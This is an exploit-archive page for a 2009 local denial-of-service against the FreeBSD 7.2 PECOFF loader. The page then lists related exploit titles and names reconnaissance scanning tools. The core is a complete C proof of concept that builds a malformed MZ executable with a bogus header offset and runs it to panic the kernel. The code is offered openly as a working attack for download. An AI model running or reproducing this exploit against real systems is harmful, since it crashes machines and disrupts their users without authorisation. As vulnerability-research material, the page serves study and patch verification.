"FreeBSD 7.2 - 'pecoff' Local Denial of Service"

Author

Exploit author

"Shaun Colley"

Platform

Exploit platform

freebsd

Release date

Exploit published date

2009-07-20

                
                    
                         Download file
                    
                
            
/* pecoff_panic.c
 *
 * by Shaun Colley, 20 July 2009
 *
 * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader
 * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`)
 *
 * panic(9) is in vm_fault due to a page fault.  the panic seems to be caused in
 * generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just
 * a DoS at the moment :)  (ugly code btw)
 *
 * tested on freebsd 7.2-RELEASE
 *
 * - shaun
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
int i, fd;
system("rm -rf evilprog.exe; touch evilprog.exe");
fd = open("evilprog.exe", O_WRONLY);
char buf[0x3a+2+0x04+4000];
buf[0] = 'M';
buf[1] = 'Z';  /* magic */
for(i = 2; i<0x3c; i++) buf[i] = 'a';
buf[0x3c] = 0xee;
buf[0x3d] = 0xee;
buf[0x3e] = 0xee;
buf[0x3f] = 0xee;
for(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61;
write(fd, buf, 0x3a+2+0x04+4000);
close(fd);
system("chmod 700 evilprog.exe");
system("./evilprog.exe");  /* run the dodgy PECOFF binary */
}

// milw0rm.com [2009-07-20]

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-04-06	"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting"	webapps	freebsd	"Matthew Aberegg"
2020-02-11	"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"	remote	freebsd	"Marco Ivaldi"
2019-12-30	"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation"	local	freebsd	"Karsten König"
2019-12-30	"FreeBSD-SA-19:02.fd - Privilege Escalation"	local	freebsd	"Karsten König"
2019-07-10	"FreeBSD 12.0 - 'fd' Local Privilege Escalation"	local	freebsd	gr4yf0x
2016-01-25	"FreeBSD SCTP ICMPv6 - Error Processing"	dos	freebsd	ptsecurity
2015-01-29	"FreeBSD - Multiple Vulnerabilities"	dos	freebsd	"Core Security"
2013-10-04	"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation"	local	freebsd	CurcolHekerLink
2013-06-26	"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)"	local	freebsd	Metasploit
2013-06-21	"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation"	local	freebsd	Hunger

Release Date	Title	Type	Platform	Author
2014-09-25	"GNU Bash - Environment Variable Command Injection (Metasploit)"	remote	cgi	"Shaun Colley"
2012-08-03	"FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service"	dos	freebsd	"Shaun Colley"
2011-09-30	"FreeBSD - UIPC socket heap Overflow (PoC)"	dos	freebsd	"Shaun Colley"
2009-08-06	"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service"	dos	freebsd	"Shaun Colley"
2009-07-20	"FreeBSD 7.2 - 'pecoff' Local Denial of Service"	dos	freebsd	"Shaun Colley"
2009-07-13	"FreeBSD 6/8 - ata Device Local Denial of Service"	dos	freebsd	"Shaun Colley"
2008-08-07	"OpenVms 8.3 Finger Service - Stack Buffer Overflow"	dos	multiple	"Shaun Colley"
2005-05-20	"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow"	remote	freebsd	"Shaun Colley"
2004-03-31	"CDP 0.33/0.4 - Console CD Player PrintTOC Function Buffer Overflow"	dos	hardware	"Shaun Colley"
2004-03-01	"Motorola T720 Phone - Denial of Service"	dos	hardware	"Shaun Colley"
2004-02-04	"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting"	webapps	cgi	"Shaun Colley"
2003-05-14	"PalmOS 3/4 - ICMP Flood Remote Denial of Service"	dos	palm_os	"Shaun Colley"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"FreeBSD 7.2 - 'pecoff' Local Denial of Service"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.